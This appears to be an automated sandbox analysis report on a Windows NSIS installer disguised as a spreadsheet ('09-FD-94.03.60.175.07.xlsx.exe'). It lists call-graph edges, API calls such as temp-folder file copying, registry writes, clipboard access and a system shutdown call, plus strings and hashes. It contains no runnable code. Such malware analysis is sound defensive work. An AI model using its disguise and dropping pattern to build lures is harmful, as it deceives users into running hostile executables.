4663->4665 4664->4665 4665->4599 4666->4624 4668 100012ea 4667->4668 4669 1000130c 4667->4669 4668->4669 4670 100012f0 lstrcpyW 4668->4670 4669->4624 4670->4669 4671->4632 5409 10001058 5411 10001074 5409->5411 5410 100010dd 5411->5410 5412 10001092 5411->5412 5413 10001516 GlobalFree 5411->5413 5414 10001516 GlobalFree 5412->5414 5413->5412 5415 100010a2 5414->5415 5416 100010b2 5415->5416 5417 100010a9 GlobalSize 5415->5417 5418 100010b6 GlobalAlloc 5416->5418 5420 100010c7 5416->5420 5417->5416 5419 1000153d 3 API calls 5418->5419 5419->5420 5421 100010d2 GlobalFree 5420->5421 5421->5410 5422 401718 5423 402b3a 18 API calls 5422->5423 5424 40171f SearchPathW 5423->5424 5425 40173a 5424->5425 4911 40159b 4912 402b3a 18 API calls 4911->4912 4913 4015a2 SetFileAttributesW 4912->4913 4914 4015b4 4913->4914 5426 40659d 5430 406421 5426->5430 5427 406d8c 5428 4064a2 GlobalFree 5429 4064ab GlobalAlloc 5428->5429 5429->5427 5429->5430 5430->5427 5430->5428 5430->5429 5430->5430 5431 406522 GlobalAlloc 5430->5431 5432 406519 GlobalFree 5430->5432 5431->5427 5431->5430 5432->5431 5433 40149e 5434 4014ac PostQuitMessage 5433->5434 5435 40223e 5433->5435 5434->5435 5436 4021a0 5437 402b3a 18 API calls 5436->5437 5438 4021a6 5437->5438 5439 402b3a 18 API calls 5438->5439 5440 4021af 5439->5440 5441 402b3a 18 API calls 5440->5441 5442 4021b8 5441->5442 5443 40628b 2 API calls 5442->5443 5444 4021c1 5443->5444 5445 4021d2 lstrlenW lstrlenW 5444->5445 5446 4021c5 5444->5446 5448 4051f2 25 API calls 5445->5448 5447 4051f2 25 API calls 5446->5447 5450 4021cd 5446->5450 5447->5450 5449 402210 SHFileOperationW 5448->5449 5449->5446 5449->5450 5451 100010e1 5460 10001111 5451->5460 5452 100011d8 GlobalFree 5453 100012ba 2 API calls 5453->5460 5454 100011d3 5454->5452 5455 100011f8 GlobalFree 5455->5460 5456 10001272 2 API calls 5459 100011c4 GlobalFree 5456->5459 5457 10001164 GlobalAlloc 5457->5460 5458 100012e1 lstrcpyW 5458->5460 5459->5460 5460->5452 5460->5453 5460->5454 5460->5455 5460->5456 5460->5457 5460->5458 5460->5459 5461 401b22 5462 401b73 5461->5462 5463 401b2f 5461->5463 5464 401b78 5462->5464 5465 401b9d GlobalAlloc 5462->5465 5468 401b46 5463->5468 5471 401bb8 5463->5471 5477 40223e 5464->5477 5482 405f48 lstrcpynW 5464->5482 5467 405f6a 18 API calls 5465->5467 5466 405f6a 18 API calls 5469 402238 5466->5469 5467->5471 5480 405f48 lstrcpynW 5468->5480 5475 405724 MessageBoxIndirectW 5469->5475 5471->5466 5471->5477 5473 401b8a GlobalFree 5473->5477 5474 401b55 5481 405f48 lstrcpynW 5474->5481 5475->5477 5478 401b64 5483 405f48 lstrcpynW 5478->5483 5480->5474 5481->5478 5482->5473 5483->5477 5484 4029a2 SendMessageW 5485 4029c7 5484->5485 5486 4029bc InvalidateRect 5484->5486 5486->5485 4097 401924 4098 401926 4097->4098 4099 402b3a 18 API calls 4098->4099 4100 40192b 4099->4100 4103 4057d0 4100->4103 4142 405a9b 4103->4142 4106 4057f8 DeleteFileW 4108 401934 4106->4108 4107 40580f 4109 40592f 4107->4109 4156 405f48 lstrcpynW 4107->4156 4109->4108 4186 40628b FindFirstFileW 4109->4186 4111 405835 4112 405848 4111->4112 4113 40583b lstrcatW 4111->4113 4157 4059df lstrlenW 4112->4157 4115 40584e 4113->4115 4117 40585e lstrcatW 4115->4117 4119 405869 lstrlenW FindFirstFileW 4115->4119 4117->4119 4119->4109 4127 40588b 4119->4127 4120 405958 4189 405993 lstrlenW CharPrevW 4120->4189 4123 405912 FindNextFileW 4123->4127 4128 405928 FindClose 4123->4128 4124 405788 5 API calls 4126 40596a 4124->4126 4129 405984 4126->4129 4130 40596e 4126->4130 4127->4123 4136 4058d3 4127->4136 4161 405f48 lstrcpynW 4127->4161 4128->4109 4132 4051f2 25 API calls 4129->4132 4130->4108 4133 4051f2 25 API calls 4130->4133 4132->4108 4135 40597b 4133->4135 4134 4057d0 64 API calls 4134->4136 4138 405de2 40 API calls 4135->4138 4136->4123 4136->4134 4137 4051f2 25 API calls 4136->4137 4162 405788 4136->4162 4170 4051f2 4136->4170 4181 405de2 4136->4181 4137->4123 4140 405982 4138->4140 4140->4108 4192 405f48 lstrcpynW 4142->4192 4144 405aac 4193 405a3e CharNextW CharNextW 4144->4193 4147 4057f0 4147->4106 4147->4107 4148 4061dc 5 API calls 4154 405ac2 4148->4154 4149 405af3 lstrlenW 4150 405afe 4149->4150 4149->4154 4152 405993 3 API calls 4150->4152 4151 40628b 2 API calls 4151->4154 4153 405b03 GetFileAttributesW 4152->4153 4153->4147 4154->4147 4154->4149 4154->4151 4155 4059df 2 API calls 4154->4155 4155->4149 4156->4111 4158 4059ed 4157->4158 4159 4059f3 CharPrevW 4158->4159 4160 4059ff 4158->4160 4159->4158 4159->4160 4160->4115 4161->4127 4199 405b8f GetFileAttributesW 4162->4199 4165 4057b5 4165->4136 4166 4057a3 RemoveDirectoryW 4168 4057b1 4166->4168 4167 4057ab DeleteFileW 4167->4168 4168->4165 4169 4057c1 SetFileAttributesW 4168->4169 4169->4165 4171 40520d 4170->4171 4180 4052af 4170->4180 4172 405229 lstrlenW 4171->4172 4173 405f6a 18 API calls 4171->4173 4174 405252 4172->4174 4175 405237 lstrlenW 4172->4175 4173->4172 4177 405265 4174->4177 4178 405258 SetWindowTextW 4174->4178 4176 405249 lstrcatW 4175->4176 4175->4180 4176->4174 4179 40526b SendMessageW SendMessageW SendMessageW 4177->4179 4177->4180 4178->4177 4179->4180 4180->4136 4202 4062b2 GetModuleHandleA 4181->4202 4185 405e0a 4185->4136 4187 4062a1 FindClose 4186->4187 4188 405954 4186->4188 4187->4188 4188->4108 4188->4120 4190 40595e 4189->4190 4191 4059af lstrcatW 4189->4191 4190->4124 4191->4190 4192->4144 4194 405a5b 4193->4194 4197 405a6d 4193->4197 4196 405a68 CharNextW 4194->4196 4194->4197 4195 405a91 4195->4147 4195->4148 4196->4195 4197->4195 4198 4059c0 CharNextW 4197->4198 4198->4197 4200 405ba1 SetFileAttributesW 4199->4200 4201 405794 4199->4201 4200->4201 4201->4165 4201->4166 4201->4167 4203 4062d9 GetProcAddress 4202->4203 4204 4062ce LoadLibraryA 4202->4204 4205 405de9 4203->4205 4204->4203 4204->4205 4205->4185 4206 405c66 lstrcpyW 4205->4206 4207 405cb5 GetShortPathNameW 4206->4207 4208 405c8f 4206->4208 4210 405cca 4207->4210 4211 405ddc 4207->4211 4231 405bb4 GetFileAttributesW CreateFileW 4208->4231 4210->4211 4213 405cd2 wsprintfA 4210->4213 4211->4185 4212 405c99 CloseHandle GetShortPathNameW 4212->4211 4214 405cad 4212->4214 4215 405f6a 18 API calls 4213->4215 4214->4207 4214->4211 4216 405cfa 4215->4216 4232 405bb4 GetFileAttributesW CreateFileW 4216->4232 4218 405d07 4218->4211 4219 405d16 GetFileSize GlobalAlloc 4218->4219 4220 405dd5 CloseHandle 4219->4220 4221 405d38 4219->4221 4220->4211 4233 405c37 ReadFile 4221->4233 4226 405d57 lstrcpyA 4229 405d79 4226->4229 4227 405d6b 4228 405b19 4 API calls 4227->4228 4228->4229 4230 405db0 SetFilePointer WriteFile GlobalFree 4229->4230 4230->4220 4231->4212 4232->4218 4234 405c55 4233->4234 4234->4220 4235 405b19 lstrlenA 4234->4235 4236 405b5a lstrlenA 4235->4236 4237 405b62 4236->4237 4238 405b33 lstrcmpiA 4236->4238 4237->4226 4237->4227 4238->4237 4239 405b51 CharNextA 4238->4239 4239->4236 5487 402224 5488 40223e 5487->5488 5489 40222b 5487->5489 5490 405f6a 18 API calls 5489->5490 5491 402238 5490->5491 5492 405724 MessageBoxIndirectW 5491->5492 5492->5488 5500 402729 5501 402730 5500->5501 5502 4029c7 5500->5502 5503 402736 FindClose 5501->5503 5503->5502 5504 401cab 5505 402b1d 18 API calls 5504->5505 5506 401cb2 5505->5506 5507 402b1d 18 API calls 5506->5507 5508 401cba GetDlgItem 5507->5508 5509 4024e8 5508->5509 5510 4042ae lstrcpynW lstrlenW 5511 4016af 5512 402b3a 18 API calls 5511->5512 5513 4016b5 GetFullPathNameW 5512->5513 5514 4016cf 5513->5514 5515 4016f1 5513->5515 5514->5515 5518 40628b 2 API calls 5514->5518 5516 401706 GetShortPathNameW 5515->5516 5517 4029c7 5515->5517 5516->5517 5519 4016e1 5518->5519 5519->5515 5521 405f48 lstrcpynW 5519->5521 5521->5515 4265 405331 4266 405352 GetDlgItem GetDlgItem GetDlgItem 4265->4266 4267 4054dd 4265->4267 4311 4041cf SendMessageW 4266->4311 4269 4054e6 GetDlgItem CreateThread CloseHandle 4267->4269 4272 40550e 4267->4272 4269->4272 4314 4052c5 OleInitialize 4269->4314 4270 4053c3 4277 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4270->4277 4271 405539 4275 405545 4271->4275 4276 405599 4271->4276 4272->4271 4273 405525 ShowWindow ShowWindow 4272->4273 4274 40555e 4272->4274 4313 4041cf SendMessageW 4273->4313 4281 404201 8 API calls 4274->4281 4279 405573 ShowWindow 4275->4279 4280 40554d 4275->4280 4276->4274 4286 4055a7 SendMessageW 4276->4286 4284 405439 4277->4284 4285 40541d SendMessageW SendMessageW 4277->4285 4282 405593 4279->4282 4283 405585 4279->4283 4287 404173 SendMessageW 4280->4287 4288 40556c 4281->4288 4290 404173 SendMessageW 4282->4290 4289 4051f2 25 API calls 4283->4289 4291 40544c 4284->4291 4292 40543e SendMessageW 4284->4292 4285->4284 4286->4288 4293 4055c0 CreatePopupMenu 4286->4293 4287->4274 4289->4282 4290->4276 4295 40419a 19 API calls 4291->4295 4292->4291 4294 405f6a 18 API calls 4293->4294 4296 4055d0 AppendMenuW 4294->4296 4297 40545c 4295->4297 4298 405600 TrackPopupMenu 4296->4298 4299 4055ed GetWindowRect 4296->4299 4300 405465 ShowWindow 4297->4300 4301 405499 GetDlgItem SendMessageW 4297->4301 4298->4288 4303 40561b 4298->4303 4299->4298 4304 405488 4300->4304 4305 40547b ShowWindow 4300->4305 4301->4288 4302 4054c0 SendMessageW SendMessageW 4301->4302 4302->4288 4306 405637 SendMessageW 4303->4306 4312 4041cf SendMessageW 4304->4312 4305->4304 4306->4306 4308 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4306->4308 4309 405679 SendMessageW 4308->4309 4309->4309 4310 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4309->4310 4310->4288 4311->4270 4312->4301 4313->4271 4315 4041e6 SendMessageW 4314->4315 4316 4052e8 4315->4316 4319 401389 2 API calls 4316->4319 4320 40530f 4316->4320 4317 4041e6 SendMessageW 4318 405321 OleUninitialize 4317->4318 4319->4316 4320->4317 5522 402331 5523 402337 5522->5523 5524 402b3a 18 API calls 5523->5524 5525 402349 5524->5525 5526 402b3a 18 API calls 5525->5526 5527 402353 RegCreateKeyExW 5526->5527 5528 40237d 5527->5528 5530 402793 5527->5530 5529 402398 5528->5529 5531 402b3a 18 API calls 5528->5531 5532 402b1d 18 API calls 5529->5532 5535 4023a4 5529->5535 5534 40238e lstrlenW 5531->5534 5532->5535 5533 4023bf RegSetValueExW 5537 4023d5 RegCloseKey 5533->5537 5534->5529 5535->5533 5536 403062 46 API calls 5535->5536 5536->5533 5537->5530 5539 404635 5540 404661 5539->5540 5541 404672 5539->5541 5600 405708 GetDlgItemTextW 5540->5600 5542 40467e GetDlgItem 5541->5542 5549 4046dd 5541->5549 5544 404692 5542->5544 5548 4046a6 SetWindowTextW 5544->5548 5552 405a3e 4 API calls 5544->5552 5545 4047c1 5598 404955 5545->5598 5602 405708 GetDlgItemTextW 5545->5602 5546 40466c 5547 4061dc 5 API calls 5546->5547 5547->5541 5553 40419a 19 API calls 5548->5553 5549->5545 5554 405f6a 18 API calls 5549->5554 5549->5598 5551 404201 8 API calls 5556 404969 5551->5556 5557 40469c 5552->5557 5558 4046c2 5553->5558 5559 404751 SHBrowseForFolderW 5554->5559 5555 4047f1 5560 405a9b 18 API calls 5555->5560 5557->5548 5564 405993 3 API calls 5557->5564 5561 40419a 19 API calls 5558->5561 5559->5545 5562 404769 CoTaskMemFree 5559->5562 5563 4047f7 5560->5563 5565 4046d0 5561->5565 5566 405993 3 API calls 5562->5566 5603 405f48 lstrcpynW 5563->5603 5564->5548 5601 4041cf SendMessageW 5565->5601 5569 404776 5566->5569 5571 4047ad SetDlgItemTextW 5569->5571 5575 405f6a 18 API calls 5569->5575 5570 4046d6 5573 4062b2 3 API calls 5570->5573 5571->5545 5572 40480e 5574 4062b2 3 API calls 5572->5574 5573->5549 5582 404816 5574->5582 5576 404795 lstrcmpiW 5575->5576 5576->5571 5578 4047a6 lstrcatW 5576->5578 5577 404855 5604 405f48 lstrcpynW 5577->5604 5578->5571 5580 40485c 5581 405a3e 4 API calls 5580->5581 5583 404862 GetDiskFreeSpaceW 5581->5583 5582->5577 5586 4059df 2 API calls 5582->5586 5587 4048a7 5582->5587 5585 404885 MulDiv 5583->5585 5583->5587 5585->5587 5586->5582 5588 4049d6 21 API calls 5587->5588 5597 404904 5587->5597 5589 4048f6 5588->5589 5592 404906 SetDlgItemTextW 5589->5592 5593 4048fb 5589->5593 5590 40140b 2 API calls 5591 404927 5590->5591 5605 4041bc KiUserCallbackDispatcher 5591->5605 5592->5597 5595 4049d6 21 API calls 5593->5595 5595->5597 5596 404943 5596->5598 5606 4045ca 5596->5606 5597->5590 5597->5591 5598->5551 5600->5546 5601->5570 5602->5555 5603->5572 5604->5580 5605->5596 5607 4045d8 5606->5607 5608 4045dd SendMessageW 5606->5608 5607->5608 5608->5598 5609 4028b6 5610 402b1d 18 API calls 5609->5610 5611 4028bc 5610->5611 5612 4028f8 5611->5612 5613 4028df 5611->5613 5617 402793 5611->5617 5614 402902 5612->5614 5615 40290e 5612->5615 5616 4028e4 5613->5616 5622 4028f5 5613->5622 5618 402b1d 18 API calls 5614->5618 5619 405f6a 18 API calls 5615->5619 5623 405f48 lstrcpynW 5616->5623 5618->5622 5619->5622 5622->5617 5624 405e8f wsprintfW 5622->5624 5623->5617 5624->5617 5625 404337 5626 40434f 5625->5626 5632 404469 5625->5632 5633 40419a 19 API calls 5626->5633 5627 4044d3 5628 4045a5 5627->5628 5629 4044dd GetDlgItem 5627->5629 5635 404201 8 API calls 5628->5635 5630 404566 5629->5630 5631 4044f7 5629->5631 5630->5628 5640 404578 5630->5640 5631->5630 5639 40451d 6 API calls 5631->5639 5632->5627 5632->5628 5636 4044a4 GetDlgItem SendMessageW 5632->5636 5634 4043b6 5633->5634 5637 40419a 19 API calls 5634->5637 5638 4045a0 5635->5638 5656 4041bc KiUserCallbackDispatcher 5636->5656 5642 4043c3 CheckDlgButton 5637->5642 5639->5630 5643 40458e 5640->5643 5644 40457e SendMessageW 5640->5644 5654 4041bc KiUserCallbackDispatcher 5642->5654 5643->5638 5648 404594 SendMessageW 5643->5648 5644->5643 5645 4044ce 5646 4045ca SendMessageW 5645->5646 5646->5627 5648->5638 5649 4043e1 GetDlgItem 5655 4041cf SendMessageW 5649->5655 5651 4043f7 SendMessageW 5652 404414 GetSysColor 5651->5652 5653 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5651->5653 5652->5653 5653->5638 5654->5649 5655->5651 5656->5645 5657 4014b8 5658 4014be 5657->5658 5659 401389 2 API calls 5658->5659 5660 4014c6 5659->5660 4681 4015b9 4682 402b3a 18 API calls 4681->4682 4683 4015c0 4682->4683 4684 405a3e 4 API calls 4683->4684 4695 4015c9 4684->4695 4685 401614 4687 401646 4685->4687 4688 401619 4685->4688 4686 4059c0 CharNextW 4689 4015d7 CreateDirectoryW 4686->4689 4692 401423 25 API calls 4687->4692 4690 401423 25 API calls 4688->4690 4691 4015ed GetLastError 4689->4691 4689->4695 4693 401620 4690->4693 4691->4695 4696 4015fa GetFileAttributesW 4691->4696 4698 40163e 4692->4698 4699 405f48 lstrcpynW 4693->4699 4695->4685 4695->4686 4696->4695 4697 40162d SetCurrentDirectoryW 4697->4698 4699->4697 5661 401939 5662 402b3a 18 API calls 5661->5662 5663 401940 lstrlenW 5662->5663 5664 4024e8 5663->5664 5665 40293b 5666 402b1d 18 API calls 5665->5666 5667 402941 5666->5667 5668 402974 5667->5668 5669 402793 5667->5669 5671 40294f 5667->5671 5668->5669 5670 405f6a 18 API calls 5668->5670 5670->5669 5671->5669 5673 405e8f wsprintfW 5671->5673 5673->5669 5674 40683c 5676 406421 5674->5676 5675 406d8c 5676->5675 5677 4064a2 GlobalFree 5676->5677 5678 4064ab GlobalAlloc 5676->5678 5679 406522 GlobalAlloc 5676->5679 5680 406519 GlobalFree 5676->5680 5677->5678 5678->5675 5678->5676 5679->5675 5679->5676 5680->5679 4915 40173f 4916 402b3a 18 API calls 4915->4916 4917 401746 4916->4917 4918 405be3 2 API calls 4917->4918 4919 40174d 4918->4919 4920 405be3 2 API calls 4919->4920 4920->4919 5681 10002a7f 5682 10002a97 5681->5682 5683 1000158f 2 API calls 5682->5683 5684 10002ab2 5683->5684

                                                          Executed Functions

                                                          Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383stringfilecomCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 17 403432-403436 14->17 18 40342c-403431 14->18 15->14 15->15 26 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->26 27 40359c-4035b6 DeleteFileW call 402dbc 16->27 20 4034f7-403506 call 4059c0 17->20 21 40343c-403442 17->21 18->17 20->11 38 403508-403509 20->38 24 403444-40344b 21->24 25 40345c-403495 21->25 31 403452 24->31 32 40344d-403450 24->32 33 4034b2-4034ec 25->33 34 403497-40349c 25->34 26->27 41 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 26->41 43 403667-403676 call 40382d OleUninitialize 27->43 44 4035bc-4035c2 27->44 31->25 32->25 32->31 36 4034f4-4034f6 33->36 37 4034ee-4034f2 33->37 34->33 40 40349e-4034a6 34->40 36->20 37->36 42 403518-403525 call 405f48 37->42 38->11 45 4034a8-4034ab 40->45 46 4034ad 40->46 41->27 41->43 42->16 56 403772-403778 43->56 57 40367c-40368c call 405724 ExitProcess 43->57 48 403657-40365e call 40391f 44->48 49 4035c8-4035d3 call 4059c0 44->49 45->33 45->46 46->33 59 403663 48->59 63 403621-40362b 49->63 64 4035d5-40360a 49->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->43 68 403823-403827 ExitProcess 61->68 69 40381f 61->69 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 66 403692-4036ac lstrcatW lstrcmpiW 63->66 67 40362d-40363b call 405a9b 63->67 71 40360c-403610 64->71 66->43 73 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 66->73 67->43 82 40363d-403653 call 405f48 * 2 67->82 69->68 75 403612-403617 71->75 76 403619-40361d 71->76 79 4036d1-4036fa call 405f48 73->79 80 4036c6-4036cc call 405f48 73->80 75->76 77 40361f 75->77 76->71 76->77 77->63 91 4036ff-40371b call 405f6a DeleteFileW 79->91 80->79 82->48 102 40375c-403764 91->102 103 40371d-40372d CopyFileW 91->103 105 403801-40380c ExitWindowsEx 92->105 106 4037f5-4037ff 92->106 93->92 96 4037a1-4037a3 93->96 96->92 100 4037a5-4037b7 GetCurrentProcess 96->100 100->92 115 4037b9-4037db 100->115 102->91 104 403766-40376d call 405de2 102->104 103->102 107 40372f-40374f call 405de2 call 405f6a call 4056c3 103->107 104->43 105->61 108 40380e-403810 call 40140b 105->108 106->105 106->108 107->102 122 403751-403758 CloseHandle 107->122 108->61 115->92 122->102
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",?), ref: 00403403
                                                          • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-820176954
                                                          • Opcode ID: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                          Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 145 405439-40543c 124->145 146 40541d-405437 SendMessageW * 2 124->146 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 149 40556c-405570 134->149 140 405573-405583 ShowWindow 135->140 141 40554d-405559 call 404173 135->141 136->134 138 40559f-4055a5 136->138 138->134 147 4055a7-4055ba SendMessageW 138->147 143 405593-405594 call 404173 140->143 144 405585-40558e call 4051f2 140->144 141->134 143->136 144->143 152 40544c-405463 call 40419a 145->152 153 40543e-40544a SendMessageW 145->153 146->145 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 147->154 155 4056bc-4056be 147->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->149 160->155 165 40561b-405632 160->165 161->160 166 405488 162->166 167 40547b-405486 ShowWindow 162->167 163->155 164 4054c0-4054d8 SendMessageW * 2 163->164 164->155 168 405637-405652 SendMessageW 165->168 169 40548e-405494 call 4041cf 166->169 167->169 168->168 171 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->171 169->163 172 405679-4056a0 SendMessageW 171->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,?), ref: 00405480
                                                          • GetDlgItem.USER32(?,?), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,?), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,?), ref: 004054F3
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
